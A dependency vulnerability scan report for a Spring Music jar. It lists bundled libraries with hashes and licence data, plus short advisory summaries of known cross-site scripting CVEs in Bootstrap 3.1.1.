Evidence Type Source Name Value Confidence Vendor central artifactid antlr Highest Vendor central groupid antlr Highest Vendor file name antlr High Vendor jar package name antlr Low Vendor pom artifactid antlr Low Vendor pom groupid antlr Highest Vendor pom name AntLR Parser Generator High Vendor pom url http://www.antlr.org/ Highest Product central artifactid antlr Highest Product file name antlr High Product pom artifactid antlr Highest Product pom groupid antlr Highest Product pom name AntLR Parser Generator High Product pom url http://www.antlr.org/ Medium Version central version 2.7.7 Highest Version file version 2.7.7 High Version pom version 2.7.7 Highest
spring-music-sqldb-1.0.jar: aspectjweaver-1.8.13.jarDescription:
The AspectJ weaver introduces advices to java classes License:
Eclipse Public License - v 1.0: http://www.eclipse.org/legal/epl-v10.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/aspectjweaver-1.8.13.jar
MD5: 4a95811a5b41a038a359c05189de9829
SHA1: ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b
SHA256: 965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27
Evidence Type Source Name Value Confidence Vendor central artifactid aspectjweaver Highest Vendor central groupid org.aspectj Highest Vendor file name aspectjweaver High Vendor jar package name aspectj Highest Vendor jar package name aspectj Low Vendor jar package name org Highest Vendor jar package name weaver Highest Vendor jar package name weaver Low Vendor Manifest can-redefine-classes true Low Vendor Manifest Implementation-Vendor aspectj.org High Vendor Manifest name org/aspectj/weaver/ Medium Vendor Manifest specification-vendor aspectj.org Low Vendor pom artifactid aspectjweaver Low Vendor pom developer email aclement@vmware.com Low Vendor pom developer id aclement Medium Vendor pom developer name Andy Clement Medium Vendor pom groupid org.aspectj Highest Vendor pom name AspectJ weaver High Vendor pom url http://www.aspectj.org Highest Product central artifactid aspectjweaver Highest Product file name aspectjweaver High Product jar package name aspectj Highest Product jar package name org Highest Product jar package name weaver Highest Product jar package name weaver Low Product Manifest can-redefine-classes true Low Product Manifest Implementation-Title org.aspectj.weaver High Product Manifest name org/aspectj/weaver/ Medium Product Manifest specification-title AspectJ Weaver Classes Medium Product pom artifactid aspectjweaver Highest Product pom developer email aclement@vmware.com Low Product pom developer id aclement Low Product pom developer name Andy Clement Low Product pom groupid org.aspectj Highest Product pom name AspectJ weaver High Product pom url http://www.aspectj.org Medium Version central version 1.8.13 Highest Version file version 1.8.13 High Version Manifest Implementation-Version 1.8.13 High Version pom version 1.8.13 Highest
spring-music-sqldb-1.0.jar: azure-client-runtime-1.0.0.jarDescription:
This package contains the basic runtime for AutoRest generated Azure Java clients. License:
The MIT License (MIT): http://opensource.org/licenses/MIT File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-client-runtime-1.0.0.jar
MD5: a30dcca70f7e92ca2fcf9934777ea8ae
SHA1: 265022f1a05a0297f9b799cd2605593d2f635e5a
SHA256: d73ce3f88efb466cd71a6aa38c10889e704f7093ab0b34982d215bf29ac11ead
Evidence Type Source Name Value Confidence Vendor file name azure-client-runtime High Vendor jar package name azure Highest Vendor jar package name azure Low Vendor jar package name microsoft Highest Vendor jar package name microsoft Low Vendor pom artifactid azure-client-runtime Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.azure Highest Vendor pom name Azure Java Client Runtime for AutoRest High Vendor pom parent-artifactid autorest-clientruntime-for-java Low Vendor pom url Azure/autorest-clientruntime-for-java Highest Product file name azure-client-runtime High Product jar package name azure Highest Product jar package name azure Low Product jar package name microsoft Highest Product pom artifactid azure-client-runtime Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.azure Highest Product pom name Azure Java Client Runtime for AutoRest High Product pom parent-artifactid autorest-clientruntime-for-java Medium Product pom url Azure/autorest-clientruntime-for-java High Version file version 1.0.0 High Version pom version 1.0.0 Highest
spring-music-sqldb-1.0.jar: azure-keyvault-1.0.0.jarDescription:
This package contains Microsoft Azure Key Vault SDK. License:
The MIT License (MIT): http://opensource.org/licenses/MIT File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-keyvault-1.0.0.jar
MD5: 9a8d568b3ed2108f4b16ed017532e39d
SHA1: 4dda51b3e10d5f5c1c19f7bf5f954af6e69a5177
SHA256: 68be4cfcf5d67d1ef12fa21cec5a2b823bdb8a761e72e46a63cf79e2b7f0b246
Evidence Type Source Name Value Confidence Vendor file name azure-keyvault High Vendor jar package name azure Highest Vendor jar package name keyvault Highest Vendor jar package name microsoft Highest Vendor Manifest Implementation-Vendor-Id com.microsoft.azure Medium Vendor pom artifactid azure-keyvault Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.azure Highest Vendor pom name Microsoft Azure SDK for Key Vault High Vendor pom parent-artifactid azure-keyvault-parent Low Vendor pom url Azure/azure-sdk-for-java Highest Product file name azure-keyvault High Product jar package name azure Highest Product jar package name keyvault Highest Product jar package name microsoft Highest Product Manifest Implementation-Title Microsoft Azure SDK for Key Vault High Product Manifest specification-title Microsoft Azure SDK for Key Vault Medium Product pom artifactid azure-keyvault Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.azure Highest Product pom name Microsoft Azure SDK for Key Vault High Product pom parent-artifactid azure-keyvault-parent Medium Product pom url Azure/azure-sdk-for-java High Version file version 1.0.0 High Version Manifest Implementation-Version 1.0.0 High Version pom version 1.0.0 Highest
Related Dependencies spring-music-sqldb-1.0.jar: azure-keyvault-webkey-1.0.0.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-keyvault-webkey-1.0.0.jar MD5: 1e86c440c92c4bc6e7ebe485d969fe8c SHA1: b50bb89de94ab5f4bfb11b7317625a7c7fe70634 SHA256: a1de57f1921e9215c8e528e842c59fc5aacda844f816581b7b56aaaa89d5a0e0 pkg:maven/com.microsoft.azure/azure-keyvault-webkey@1.0.0 spring-music-sqldb-1.0.jar: bootstrap-3.1.1.jarDescription:
WebJar for Bootstrap License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bootstrap-3.1.1.jar
MD5: 636baf40fe72fa6b36c2cf173f04a81a
SHA1: a11ab29de60b76fa111a2ca583de57abdbbcad26
SHA256: 5e42d07a9896e06b4b0cbad6c0c30051bb2b213edbd9c02c78dc096612c41e99
Evidence Type Source Name Value Confidence Vendor file name bootstrap High Vendor pom artifactid bootstrap Low Vendor pom developer email james@jamesward.org Low Vendor pom developer id jamesward Medium Vendor pom developer name James Ward Medium Vendor pom groupid org.webjars Highest Vendor pom name Bootstrap High Vendor pom url http://webjars.org Highest Product file name bootstrap High Product pom artifactid bootstrap Highest Product pom developer email james@jamesward.org Low Product pom developer id jamesward Low Product pom developer name James Ward Low Product pom groupid org.webjars Highest Product pom name Bootstrap High Product pom url http://webjars.org Medium Version file version 3.1.1 High Version pom version 3.1.1 Highest
CVE-2016-10735 suppress
In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-4p24-vmcr-4gqj Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (excluding) 3.4.0 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:* CVE-2018-14041 suppress
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - VENDOR_ADVISORY info - https://github.com/advisories/GHSA-pj7m-g53m-7638 info - https://github.com/twbs/bootstrap/issues/20184 Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 4.0.0; versions up to (excluding) 4.1.2 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha3:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha4:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha5:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha6:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta3:*:*:*:*:*:* CVE-2018-14042 suppress
In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - VENDOR_ADVISORY info - https://github.com/twbs/bootstrap/issues/20184 Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 4.0.0; versions up to (excluding) 4.1.2 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha3:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha4:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha5:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha6:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta3:*:*:*:*:*:* CVE-2018-20676 suppress
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 CVE-2018-20677 suppress
In Bootstrap before 3.4.0, XSS is possible in the affix configuration target property. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY info - https://github.com/advisories/GHSA-ph58-4vrj-w6hr Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 CVE-2018-14040 (OSSINDEX) suppress
In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:* CVE-2019-8331 (OSSINDEX) suppress
In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2019-8331 for details CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:* CVE-2024-6484 (OSSINDEX) suppress
A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-6484 for details CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:* CVE-2024-6485 (OSSINDEX) suppress
A security vulnerability has been discovered in bootstrap that could enable Cross-Site Scripting (XSS) attacks. The vulnerability is associated with the data-loading-text attribute within the button plugin. This vulnerability can be exploited by injecting malicious JavaScript code into the attribute, which would then be executed when the button's loading state is triggered. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv2:
Base Score: LOW (2.0999999046325684) Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:* Bootstrap before 4.0.0 is end-of-life and no longer maintained. (RETIREJS) suppress
Bootstrap before 4.0.0 is end-of-life and no longer maintained. Unscored:
References:
spring-music-sqldb-1.0.jar: bootstrap-3.1.1.jar: webjars-requirejs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bootstrap-3.1.1.jar/META-INF/resources/webjars/bootstrap/3.1.1/webjars-requirejs.jsMD5: 789ccf1bc1a08036d1753c43bc6ac838SHA1: c68ffdc2c076c8630fca6184eef122826249f40bSHA256: 108ecc9810d96376defeeb6b5d1788e36c5ee278287d8c3dfa0f0900e83c8523
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: bson-3.6.3.jarDescription:
The BSON library License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bson-3.6.3.jar
MD5: 77bdd3e2c3d577c0ed383dbf479f8af7
SHA1: 6c85ddf1fc96eb8776213bef6665d005a564ecd3
SHA256: 51c988ca3f913acd0d36a72283cc158902f85ee9ffd14c5005311871f6f9a1ed
Evidence Type Source Name Value Confidence Vendor central artifactid bson Highest Vendor central groupid org.mongodb Highest Vendor file name bson High Vendor jar package name bson Highest Vendor jar package name bson Low Vendor Manifest bundle-symbolicname org.mongodb.bson Medium Vendor pom artifactid bson Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name BSON High Vendor pom url http://bsonspec.org Highest Product central artifactid bson Highest Product file name bson High Product jar package name bson Highest Product Manifest Bundle-Name bson Medium Product Manifest bundle-symbolicname org.mongodb.bson Medium Product pom artifactid bson Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name BSON High Product pom url http://bsonspec.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version Manifest build-version 3.6.3 Medium Version Manifest Bundle-Version 3.6.3 High Version pom version 3.6.3 Highest
spring-music-sqldb-1.0.jar: classmate-1.3.4.jarDescription:
Library for introspecting types with full generic information
including resolving of field and method types.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/classmate-1.3.4.jar
MD5: 1e2e0fcc510753882683417e01895242
SHA1: 03d5f48f10bbe4eb7bd862f10c0583be2e0053c6
SHA256: c2bfcc21467351d0f9a1558822b72dbac2b21f6b9f700a44fc6b345491ef3c88
Evidence Type Source Name Value Confidence Vendor file name classmate High Vendor jar package name classmate Highest Vendor jar package name fasterxml Highest Vendor jar package name types Highest Vendor Manifest automatic-module-name com.fasterxml.classmate Medium Vendor Manifest bundle-docurl http://github.com/FasterXML/java-classmate Low Vendor Manifest bundle-symbolicname com.fasterxml.classmate Medium Vendor Manifest implementation-build-date 2017-09-09 21:47:22+0000 Low Vendor Manifest Implementation-Vendor fasterxml.com High Vendor Manifest Implementation-Vendor-Id com.fasterxml Medium Vendor Manifest specification-vendor fasterxml.com Low Vendor pom artifactid classmate Low Vendor pom developer email blangel@ocheyedan.net Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id blangel Medium Vendor pom developer id tatu Medium Vendor pom developer name Brian Langel Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid com.fasterxml Highest Vendor pom name ClassMate High Vendor pom organization name fasterxml.com High Vendor pom organization url http://fasterxml.com Medium Vendor pom parent-artifactid oss-parent Low Vendor pom url http://github.com/FasterXML/java-classmate Highest Product file name classmate High Product jar package name classmate Highest Product jar package name fasterxml Highest Product jar package name types Highest Product Manifest automatic-module-name com.fasterxml.classmate Medium Product Manifest bundle-docurl http://github.com/FasterXML/java-classmate Low Product Manifest Bundle-Name ClassMate Medium Product Manifest bundle-symbolicname com.fasterxml.classmate Medium Product Manifest implementation-build-date 2017-09-09 21:47:22+0000 Low Product Manifest Implementation-Title ClassMate High Product Manifest specification-title ClassMate Medium Product pom artifactid classmate Highest Product pom developer email blangel@ocheyedan.net Low Product pom developer email tatu@fasterxml.com Low Product pom developer id blangel Low Product pom developer id tatu Low Product pom developer name Brian Langel Low Product pom developer name Tatu Saloranta Low Product pom groupid com.fasterxml Highest Product pom name ClassMate High Product pom organization name fasterxml.com Low Product pom organization url http://fasterxml.com Low Product pom parent-artifactid oss-parent Medium Product pom url http://github.com/FasterXML/java-classmate Medium Version file version 1.3.4 High Version Manifest Bundle-Version 1.3.4 High Version Manifest Implementation-Version 1.3.4 High Version pom parent-version 1.3.4 Low Version pom version 1.3.4 Highest
spring-music-sqldb-1.0.jar: client-runtime-1.0.0.jarDescription:
This package contains the basic runtime for AutoRest generated Java clients. License:
The MIT License (MIT): http://opensource.org/licenses/MIT File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/client-runtime-1.0.0.jar
MD5: ea31cb0e32ea8a1c48cb0b7e7f0a455b
SHA1: 44e60e33655f29e6179708b87e2421abb6e2e8fb
SHA256: 31e2238350905ac1f1bbf79b7d5949b7f70c5f6ea36f3065e5edf884353eef8b
Evidence Type Source Name Value Confidence Vendor file name client-runtime High Vendor jar package name microsoft Highest Vendor jar package name microsoft Low Vendor jar package name rest Highest Vendor jar package name rest Low Vendor pom artifactid client-runtime Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.rest Highest Vendor pom name Java Client Runtime for AutoRest High Vendor pom parent-artifactid autorest-clientruntime-for-java Low Vendor pom parent-groupid com.microsoft.azure Medium Vendor pom url Azure/autorest-clientruntime-for-java Highest Product file name client-runtime High Product jar package name microsoft Highest Product jar package name rest Highest Product jar package name rest Low Product pom artifactid client-runtime Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.rest Highest Product pom name Java Client Runtime for AutoRest High Product pom parent-artifactid autorest-clientruntime-for-java Medium Product pom parent-groupid com.microsoft.azure Medium Product pom url Azure/autorest-clientruntime-for-java High Version file version 1.0.0 High Version pom version 1.0.0 Highest
spring-music-sqldb-1.0.jar: commons-codec-1.11.jarDescription:
The Apache Commons Codec package contains simple encoder and decoders for
various formats such as Base64 and Hexadecimal. In addition to these
widely used encoders and decoders, the codec package also maintains a
collection of phonetic encoding utilities.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-codec-1.11.jar
MD5: 567159b1ae257a43e1391a8f59d24cfe
SHA1: 3acb4705652e16236558f0f4f2192cc33c3bd189
SHA256: e599d5318e97aa48f42136a2927e6dfa4e8881dff0e6c8e3109ddbbff51d7b7d
Evidence Type Source Name Value Confidence Vendor file name commons-codec High Vendor jar package name apache Highest Vendor jar package name codec Highest Vendor jar package name commons Highest Vendor jar package name encoder Highest Vendor Manifest automatic-module-name org.apache.commons.codec Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-codec/ Low Vendor Manifest bundle-symbolicname org.apache.commons.codec Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-codec/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id commons-codec Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-codec Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email dgraham@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jon@collab.net Low Vendor pom developer email julius@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@totalsync.com Low Vendor pom developer email tn@apache.org Low Vendor pom developer email tobrien@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id dgraham Medium Vendor pom developer id dlr Medium Vendor pom developer id ggregory Medium Vendor pom developer id jon Medium Vendor pom developer id julius Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id tn Medium Vendor pom developer id tobrien Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name David Graham Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name Jon S. Stevens Medium Vendor pom developer name Julius Davies Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer name Tim OBrien Medium Vendor pom developer org URL http://juliusdavies.ca/ Medium Vendor pom groupid commons-codec Highest Vendor pom name Apache Commons Codec High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-codec/ Highest Product file name commons-codec High Product jar package name apache Highest Product jar package name codec Highest Product jar package name commons Highest Product jar package name encoder Highest Product Manifest automatic-module-name org.apache.commons.codec Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-codec/ Low Product Manifest Bundle-Name Apache Commons Codec Medium Product Manifest bundle-symbolicname org.apache.commons.codec Medium Product Manifest Implementation-Title Apache Commons Codec High Product Manifest implementation-url http://commons.apache.org/proper/commons-codec/ Low Product Manifest specification-title Apache Commons Codec Medium Product pom artifactid commons-codec Highest Product pom developer email bayard@apache.org Low Product pom developer email dgraham@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jon@collab.net Low Product pom developer email julius@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email sanders@totalsync.com Low Product pom developer email tn@apache.org Low Product pom developer email tobrien@apache.org Low Product pom developer id bayard Low Product pom developer id dgraham Low Product pom developer id dlr Low Product pom developer id ggregory Low Product pom developer id jon Low Product pom developer id julius Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id tn Low Product pom developer id tobrien Low Product pom developer name Daniel Rall Low Product pom developer name David Graham Low Product pom developer name Gary Gregory Low Product pom developer name Henri Yandell Low Product pom developer name Jon S. Stevens Low Product pom developer name Julius Davies Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Thomas Neidhart Low Product pom developer name Tim OBrien Low Product pom developer org URL http://juliusdavies.ca/ Low Product pom groupid commons-codec Highest Product pom name Apache Commons Codec High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-codec/ Medium Version file version 1.11 High Version Manifest Implementation-Version 1.11 High Version pom parent-version 1.11 Low Version pom version 1.11 Highest
spring-music-sqldb-1.0.jar: commons-collections4-4.1.jarDescription:
The Apache Commons Collections package contains types that extend and augment the Java Collections Framework. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-collections4-4.1.jar
MD5: 45af6a8e5b51d5945de6c7411e290bd1
SHA1: a4cf4688fe1c7e3a63aa636cc96d013af537768e
SHA256: b1fe8b5968b57d8465425357ed2d9dc695504518bed2df5b565c4b8e68c1c8a5
